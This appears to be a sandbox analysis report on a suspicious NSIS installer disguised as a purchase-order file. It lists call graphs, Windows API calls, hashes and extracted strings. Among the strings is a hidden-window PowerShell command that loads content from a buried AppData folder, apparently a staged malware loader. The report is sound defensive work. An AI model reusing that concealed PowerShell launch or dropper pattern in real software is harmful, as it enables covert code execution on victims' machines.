4065c9 wsprintfW 4680->4682 4682->4676 4683 401f17 4684 402dab 21 API calls 4683->4684 4685 401f1d 4684->4685 4686 402dab 21 API calls 4685->4686 4687 401f26 4686->4687 4688 402dab 21 API calls 4687->4688 4689 401f2f 4688->4689 4690 402dab 21 API calls 4689->4690 4691 401f38 4690->4691 4692 401423 28 API calls 4691->4692 4693 401f3f 4692->4693 4700 405ca8 ShellExecuteExW 4693->4700 4695 401f87 4696 406b21 5 API calls 4695->4696 4697 402933 4695->4697 4698 401fa4 CloseHandle 4696->4698 4698->4697 4700->4695 4701 402f98 4702 402faa SetTimer 4701->4702 4704 402fc3 4701->4704 4702->4704 4703 403011 4704->4703 4705 403017 MulDiv 4704->4705 4706 402fd1 wsprintfW SetWindowTextW SetDlgItemTextW 4705->4706 4706->4703 4708 401d1c 4709 402d89 21 API calls 4708->4709 4710 401d22 IsWindow 4709->4710 4711 401a25 4710->4711 4712 40149e 4713 4023a2 4712->4713 4714 4014ac PostQuitMessage 4712->4714 4714->4713 4715 401ba0 4716 401bf1 4715->4716 4720 401bad 4715->4720 4717 401c1b GlobalAlloc 4716->4717 4721 401bf6 4716->4721 4718 4066bf 21 API calls 4717->4718 4722 401c36 4718->4722 4719 4066bf 21 API calls 4723 40239c 4719->4723 4720->4722 4724 401bc4 4720->4724 4728 4023a2 4721->4728 4736 406682 lstrcpynW 4721->4736 4722->4719 4722->4728 4730 405ce2 MessageBoxIndirectW 4723->4730 4734 406682 lstrcpynW 4724->4734 4727 401c08 GlobalFree 4727->4728 4729 401bd3 4735 406682 lstrcpynW 4729->4735 4730->4728 4732 401be2 4737 406682 lstrcpynW 4732->4737 4734->4729 4735->4732 4736->4727 4737->4728 4738 406da0 4742 406c24 4738->4742 4739 40758f 4740 406ca5 GlobalFree 4741 406cae GlobalAlloc 4740->4741 4741->4739 4741->4742 4742->4739 4742->4740 4742->4741 4743 406d25 GlobalAlloc 4742->4743 4744 406d1c GlobalFree 4742->4744 4743->4739 4743->4742 4744->4743 4745 402621 4746 402dab 21 API calls 4745->4746 4747 402628 4746->4747 4750 406172 GetFileAttributesW CreateFileW 4747->4750 4749 402634 4750->4749 3401 4025a3 3413 402deb 3401->3413 3404 402d89 21 API calls 3405 4025b6 3404->3405 3406 4025c5 3405->3406 3410 402933 3405->3410 3407 4025d2 RegEnumKeyW 3406->3407 3408 4025de RegEnumValueW 3406->3408 3411 4025fa RegCloseKey 3407->3411 3409 4025f3 3408->3409 3408->3411 3409->3411 3411->3410 3418 402dab 3413->3418 3415 402e02 3416 4064ef RegOpenKeyExW 3415->3416 3417 4025ad 3416->3417 3417->3404 3419 402db7 3418->3419 3420 4066bf 21 API calls 3419->3420 3421 402dd8 3420->3421 3422 402de4 3421->3422 3423 406930 5 API calls 3421->3423 3422->3415 3423->3422 4751 4015a8 4752 402dab 21 API calls 4751->4752 4753 4015af SetFileAttributesW 4752->4753 4754 4015c1 4753->4754 4005 401fa9 4006 402dab 21 API calls 4005->4006 4007 401faf 4006->4007 4008 405707 28 API calls 4007->4008 4009 401fb9 4008->4009 4010 405c65 2 API calls 4009->4010 4011 401fbf 4010->4011 4012 402933 4011->4012 4019 401fe2 CloseHandle 4011->4019 4020 406b21 WaitForSingleObject 4011->4020 4015 401fd4 4016 401fe4 4015->4016 4017 401fd9 4015->4017 4016->4019 4025 4065c9 wsprintfW 4017->4025 4019->4012 4021 406b3b 4020->4021 4022 406b4d GetExitCodeProcess 4021->4022 4023 406ab2 2 API calls 4021->4023 4022->4015 4024 406b42 WaitForSingleObject 4023->4024 4024->4021 4025->4019 4762 404aab 4763 404ae1 4762->4763 4764 404abb 4762->4764 4766 404668 8 API calls 4763->4766 4765 404601 22 API calls 4764->4765 4767 404ac8 SetDlgItemTextW 4765->4767 4768 404aed 4766->4768 4767->4763 4026 40252f 4027 402deb 21 API calls 4026->4027 4028 402539 4027->4028 4029 402dab 21 API calls 4028->4029 4030 402542 4029->4030 4031 40254d RegQueryValueExW 4030->4031 4035 402933 4030->4035 4032 402573 RegCloseKey 4031->4032 4033 40256d 4031->4033 4032->4035 4033->4032 4037 4065c9 wsprintfW 4033->4037 4037->4032 4769 40202f 4770 402dab 21 API calls 4769->4770 4771 402036 4770->4771 4772 406a76 5 API calls 4771->4772 4773 402045 4772->4773 4774 402061 GlobalAlloc 4773->4774 4776 4020d1 4773->4776 4775 402075 4774->4775 4774->4776 4777 406a76 5 API calls 4775->4777 4778 40207c 4777->4778 4779 406a76 5 API calls 4778->4779 4780 402086 4779->4780 4780->4776 4784 4065c9 wsprintfW 4780->4784 4782 4020bf 4785 4065c9 wsprintfW 4782->4785 4784->4782 4785->4776 4786 4021af 4787 402dab 21 API calls 4786->4787 4788 4021b6 4787->4788 4789 402dab 21 API calls 4788->4789 4790 4021c0 4789->4790 4791 402dab 21 API calls 4790->4791 4792 4021ca 4791->4792 4793 402dab 21 API calls 4792->4793 4794 4021d4 4793->4794 4795 402dab 21 API calls 4794->4795 4796 4021de 4795->4796 4797 40221d CoCreateInstance 4796->4797 4798 402dab 21 API calls 4796->4798 4799 40223c 4797->4799 4798->4797 4800 401423 28 API calls 4799->4800 4801 4022fb 4799->4801 4800->4801 4802 401a35 4803 402dab 21 API calls 4802->4803 4804 401a3e ExpandEnvironmentStringsW 4803->4804 4805 401a52 4804->4805 4807 401a65 4804->4807 4806 401a57 lstrcmpW 4805->4806 4805->4807 4806->4807 3988 4023b7 3989 4023c5 3988->3989 3990 4023bf 3988->3990 3992 4023d3 3989->3992 3994 402dab 21 API calls 3989->3994 3991 402dab 21 API calls 3990->3991 3991->3989 3993 4023e1 3992->3993 3995 402dab 21 API calls 3992->3995 3996 402dab 21 API calls 3993->3996 3994->3992 3995->3993 3997 4023ea WritePrivateProfileStringW 3996->3997 4808 404737 lstrcpynW lstrlenW 4814 4014b8 4815 4014be 4814->4815 4816 401389 2 API calls 4815->4816 4817 4014c6 4816->4817 4818 402439 4819 402441 4818->4819 4820 40246c 4818->4820 4821 402deb 21 API calls 4819->4821 4822 402dab 21 API calls 4820->4822 4823 402448 4821->4823 4824 402473 4822->4824 4826 402480 4823->4826 4827 402dab 21 API calls 4823->4827 4829 402e69 4824->4829 4828 402459 RegDeleteValueW RegCloseKey 4827->4828 4828->4826 4830 402e7d 4829->4830 4831 402e76 4829->4831 4830->4831 4833 402eae 4830->4833 4831->4826 4834 4064ef RegOpenKeyExW 4833->4834 4835 402edc 4834->4835 4836 402f86 4835->4836 4837 402eec RegEnumValueW 4835->4837 4841 402f0f 4835->4841 4836->4831 4838 402f76 RegCloseKey 4837->4838 4837->4841 4838->4836 4839 402f4b RegEnumKeyW 4840 402f54 RegCloseKey 4839->4840 4839->4841 4842 406a76 5 API calls 4840->4842 4841->4838 4841->4839 4841->4840 4843 402eae 6 API calls 4841->4843 4844 402f64 4842->4844 4843->4841 4844->4836 4845 402f68 RegDeleteKeyW 4844->4845 4845->4836 4846 40173a 4847 402dab 21 API calls 4846->4847 4848 401741 SearchPathW 4847->4848 4849 40175c 4848->4849 4850 401d3d 4851 402d89 21 API calls 4850->4851 4852 401d44 4851->4852 4853 402d89 21 API calls 4852->4853 4854 401d50 GetDlgItem 4853->4854 4855 40263d 4854->4855

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 403645-403697 SetErrorMode GetVersionExW 1 4036d1-4036d6 0->1 2 403699-4036c9 GetVersionExW 0->2 3 4036d8 1->3 4 4036de-403720 1->4 2->1 3->4 5 403722-40372a call 406a76 4->5 6 403733 4->6 5->6 11 40372c 5->11 8 403738-40374c call 406a06 lstrlenA 6->8 13 40374e-40376a call 406a76 * 3 8->13 11->6 20 40377b-4037df #17 OleInitialize SHGetFileInfoW call 406682 GetCommandLineW call 406682 13->20 21 40376c-403772 13->21 28 4037e1-4037e3 20->28 29 4037e8-4037fc call 405f7e CharNextW 20->29 21->20 25 403774 21->25 25->20 28->29 32 4038f7-4038fd 29->32 33 403801-403807 32->33 34 403903 32->34 35 403810-403817 33->35 36 403809-40380e 33->36 37 403917-403931 GetTempPathW call 403614 34->37 38 403819-40381e 35->38 39 40381f-403823 35->39 36->35 36->36 47 403933-403951 GetWindowsDirectoryW lstrcatW call 403614 37->47 48 403989-4039a3 DeleteFileW call 4030d5 37->48 38->39 41 4038e4-4038f3 call 405f7e 39->41 42 403829-40382f 39->42 41->32 59 4038f5-4038f6 41->59 45 403831-403838 42->45 46 403849-403882 42->46 52 40383a-40383d 45->52 53 40383f 45->53 54 403884-403889 46->54 55 40389f-4038d9 46->55 47->48 62 403953-403983 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403614 47->62 64 403b90-403ba0 call 403c62 OleUninitialize 48->64 65 4039a9-4039af 48->65 52->46 52->53 53->46 54->55 61 40388b-403893 54->61 57 4038e1-4038e3 55->57 58 4038db-4038df 55->58 57->41 58->57 63 403905-403912 call 406682 58->63 59->32 66 403895-403898 61->66 67 40389a 61->67 62->48 62->64 63->37 77 403ba2-403bb2 call 405ce2 ExitProcess 64->77 78 403bc6-403bcc 64->78 70 4039b5-4039c0 call 405f7e 65->70 71 403a48-403a4f call 403d54 65->71 66->55 66->67 67->55 82 4039c2-4039f7 70->82 83 403a0e-403a18 70->83 80 403a54-403a58 71->80 84 403c4a-403c52 78->84 85 403bce-403be4 GetCurrentProcess OpenProcessToken 78->85 80->64 91 4039f9-4039fd 82->91 86 403a1a-403a28 call 406059 83->86 87 403a5d-403a83 call 405c4d lstrlenW call 406682 83->87 88 403c54 84->88 89 403c58-403c5c ExitProcess 84->89 92 403be6-403c14 LookupPrivilegeValueW AdjustTokenPrivileges 85->92 93 403c1a-403c28 call 406a76 85->93 86->64 106 403a2e-403a44 call 406682 * 2 86->106 110 403a94-403aac 87->110 111 403a85-403a8f call 406682 87->111 88->89 97 403a06-403a0a 91->97 98 4039ff-403a04 91->98 92->93 104 403c36-403c41 ExitWindowsEx 93->104 105 403c2a-403c34 93->105 97->91 99 403a0c 97->99 98->97 98->99 99->83 104->84 108 403c43-403c45 call 40140b 104->108 105->104 105->108 106->71 108->84 116 403ab1-403ab5 110->116 111->110 118 403aba-403ae4 wsprintfW call 4066bf 116->118 122 403ae6-403aeb call 405bd6 118->122 123 403aed call 405c30 118->123 127 403af2-403af4 122->127 123->127 128 403b30-403b4f SetCurrentDirectoryW call 406442 CopyFileW 127->128 129 403af6-403b00 GetFileAttributesW 127->129 137 403b51-403b72 call 406442 call 4066bf call 405c65 128->137 138 403b8e 128->138 130 403b21-403b2c 129->130 131 403b02-403b0b DeleteFileW 129->131 130->116 134 403b2e 130->134 131->130 133 403b0d-403b1f call 405d8e 131->133 133->118 133->130 134->64 146 403b74-403b7e 137->146 147 403bb8-403bc4 CloseHandle 137->147 138->64 146->138 148 403b80-403b88 call 4069df 146->148 147->138 148->118 148->138
                                                        APIs
                                                        • SetErrorMode.KERNELBASE ref: 00403668
                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403693
                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036A6
                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040373F
                                                        • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040377C
                                                        • OleInitialize.OLE32(00000000), ref: 00403783
                                                        • SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037A2
                                                        • GetCommandLineW.KERNEL32(00428A60,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037B7
                                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe",00000020,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe",00000000,?,00000008,0000000A,0000000C), ref: 004037F0
                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403928
                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403939
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403945
                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403961
                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403972
                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040397A
                                                        • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040398E
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A67
                                                          • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                        • wsprintfW.USER32 ref: 00403AC4
                                                        • GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 00403AF7
                                                        • DeleteFileW.KERNEL32(0042C800), ref: 00403B03
                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B31
                                                          • Part of subcall function 00406442: MoveFileExW.KERNEL32(?,?,00000005,00405F40,?,00000000,000000F1,?,?,?,?,?), ref: 0040644C
                                                        • CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403B47
                                                          • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                          • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                          • Part of subcall function 004069DF: FindFirstFileW.KERNELBASE(74DF3420,00425F98,00425750,004060A2,00425750,00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004069EA
                                                          • Part of subcall function 004069DF: FindClose.KERNEL32(00000000), ref: 004069F6
                                                        • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403B95
                                                        • ExitProcess.KERNEL32 ref: 00403BB2
                                                        • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403BB9
                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403BD5
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403BDC
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BF1
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403C14
                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C39
                                                        • ExitProcess.KERNEL32 ref: 00403C5C
                                                          • Part of subcall function 00405C30: CreateDirectoryW.KERNELBASE(?,00000000,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405C36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                        • String ID: "C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"$"powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\A$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                        • API String ID: 1813718867-3132114228
                                                        • Opcode ID: cb08dbe130f91360e7a1dfc8e1a880fb8121424293655edcd1d70ad09613bc60
                                                        • Instruction ID: d2a3103bd0adf94391fd0ebfa47e937d37e61a7cc597b22c14a72094b2238e17
                                                        • Opcode Fuzzy Hash: cb08dbe130f91360e7a1dfc8e1a880fb8121424293655edcd1d70ad09613bc60
                                                        • Instruction Fuzzy Hash: 4CF1E531604300AAD320AF759D05B2B7EE8AB8570AF11483FF585B22D1DB7C9A41CB6E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 151 405846-405861 152 4059f0-4059f7 151->152 153 405867-40592e GetDlgItem * 3 call 404636 call 404f8f GetClientRect GetSystemMetrics SendMessageW * 2 151->153 155 405a21-405a2e 152->155 156 4059f9-405a1b GetDlgItem CreateThread FindCloseChangeNotification 152->156 171 405930-40594a SendMessageW * 2 153->171 172 40594c-40594f 153->172 157 405a30-405a36 155->157 158 405a4c-405a56 155->158 156->155 160 405a71-405a7a call 404668 157->160 161 405a38-405a47 ShowWindow * 2 call 404636 157->161 162 405a58-405a5e 158->162 163 405aac-405ab0 158->163 175 405a7f-405a83 160->175 161->158 168 405a60-405a6c call 4045da 162->168 169 405a86-405a96 ShowWindow 162->169 163->160 166 405ab2-405ab8 163->166 166->160 173 405aba-405acd SendMessageW 166->173 168->160 176 405aa6-405aa7 call 4045da 169->176 177 405a98-405aa1 call 405707 169->177 171->172 178 405951-40595d SendMessageW 172->178 179 40595f-405976 call 404601 172->179 180 405ad3-405afe CreatePopupMenu call 4066bf AppendMenuW 173->180 181 405bcf-405bd1 173->181 176->163 177->176 178->179 190 405978-40598c ShowWindow 179->190 191 4059ac-4059cd GetDlgItem SendMessageW 179->191 188 405b00-405b10 GetWindowRect 180->188 189 405b13-405b28 TrackPopupMenu 180->189 181->175 188->189 189->181 192 405b2e-405b45 189->192 193 40599b 190->193 194 40598e-405999 ShowWindow 190->194 191->181 195 4059d3-4059eb SendMessageW * 2 191->195 196 405b4a-405b65 SendMessageW 192->196 197 4059a1-4059a7 call 404636 193->197 194->197 195->181 196->196 198 405b67-405b8a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 196->198 197->191 200 405b8c-405bb3 SendMessageW 198->200 200->200 201 405bb5-405bc9 GlobalUnlock SetClipboardData CloseClipboard 200->201 201->181
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000403), ref: 004058A4
                                                        • GetDlgItem.USER32(?,000003EE), ref: 004058B3
                                                        • GetClientRect.USER32(?,?), ref: 004058F0
                                                        • GetSystemMetrics.USER32(00000002), ref: 004058F7
                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405918
                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405929
                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040593C
                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040594A
                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040595D
                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040597F
                                                        • ShowWindow.USER32(?,00000008), ref: 00405993
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004059B4
                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059C4
                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059DD
                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059E9
                                                        • GetDlgItem.USER32(?,000003F8), ref: 004058C2
                                                          • Part of subcall function 00404636: SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644
                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405A06
                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000057DA,00000000), ref: 00405A14
                                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405A1B
                                                        • ShowWindow.USER32(00000000), ref: 00405A3F
                                                        • ShowWindow.USER32(?,00000008), ref: 00405A44
                                                        • ShowWindow.USER32(00000008), ref: 00405A8E
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AC2
                                                        • CreatePopupMenu.USER32 ref: 00405AD3
                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AE7
                                                        • GetWindowRect.USER32(?,?), ref: 00405B07
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B20
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B58
                                                        • OpenClipboard.USER32(00000000), ref: 00405B68
                                                        • EmptyClipboard.USER32 ref: 00405B6E
                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B7A
                                                        • GlobalLock.KERNEL32(00000000), ref: 00405B84
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B98
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405BB8
                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405BC3
                                                        • CloseClipboard.USER32 ref: 00405BC9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                        • String ID: H/B${
                                                        • API String ID: 4154960007-332483393
                                                        • Opcode ID: 4ad71a5ae84d1442ca64332f301171ed24ad3ca4da0b040a8c0bb5ec3df77bcf
                                                        • Instruction ID: 1bfd88ad0a039f30930ce625e3f17186fc56f4394c79b8c388f8475f2b475093
                                                        • Opcode Fuzzy Hash: 4ad71a5ae84d1442ca64332f301171ed24ad3ca4da0b040a8c0bb5ec3df77bcf
                                                        • Instruction Fuzzy Hash: A7B127B1900608FFDB21AF60DD85DAE7B79FB44354F00413AFA41A61A0CB795E52DF68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 515 405d8e-405db4 call 406059 518 405db6-405dc8 DeleteFileW 515->518 519 405dcd-405dd4 515->519 520 405f4a-405f4e 518->520 521 405dd6-405dd8 519->521 522 405de7-405df7 call 406682 519->522 523 405ef8-405efd 521->523 524 405dde-405de1 521->524 528 405e06-405e07 call 405f9d 522->528 529 405df9-405e04 lstrcatW 522->529 523->520 527 405eff-405f02 523->527 524->522 524->523 530 405f04-405f0a 527->530 531 405f0c-405f14 call 4069df 527->531 532 405e0c-405e10 528->532 529->532 530->520 531->520 539 405f16-405f2a call 405f51 call 405d46 531->539 535 405e12-405e1a 532->535 536 405e1c-405e22 lstrcatW 532->536 535->536 538 405e27-405e43 lstrlenW FindFirstFileW 535->538 536->538 540 405e49-405e51 538->540 541 405eed-405ef1 538->541 555 405f42-405f45 call 405707 539->555 556 405f2c-405f2f 539->556 545 405e71-405e85 call 406682 540->545 546 405e53-405e5b 540->546 541->523 544 405ef3 541->544 544->523 557 405e87-405e8f 545->557 558 405e9c-405ea7 call 405d46 545->558 549 405ed0-405ee0 FindNextFileW 546->549 550 405e5d-405e65 546->550 549->540 554 405ee6-405ee7 FindClose 549->554 550->545 551 405e67-405e6f 550->551 551->545 551->549 554->541 555->520 556->530 559 405f31-405f40 call 405707 call 406442 556->559 557->549 560 405e91-405e9a call 405d8e 557->560 568 405ec8-405ecb call 405707 558->568 569 405ea9-405eac 558->569 559->520 560->549 568->549 572 405ec0-405ec6 569->572 573 405eae-405ebe call 405707 call 406442 569->573 572->549 573->549
                                                        APIs
                                                        • DeleteFileW.KERNEL32(?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"), ref: 00405DB7
                                                        • lstrcatW.KERNEL32(00424F50,\*.*), ref: 00405DFF
                                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405E22
                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"), ref: 00405E28
                                                        • FindFirstFileW.KERNELBASE(00424F50,?,?,?,0040A014,?,00424F50,?,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"), ref: 00405E38
                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ED8
                                                        • FindClose.KERNEL32(00000000), ref: 00405EE7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
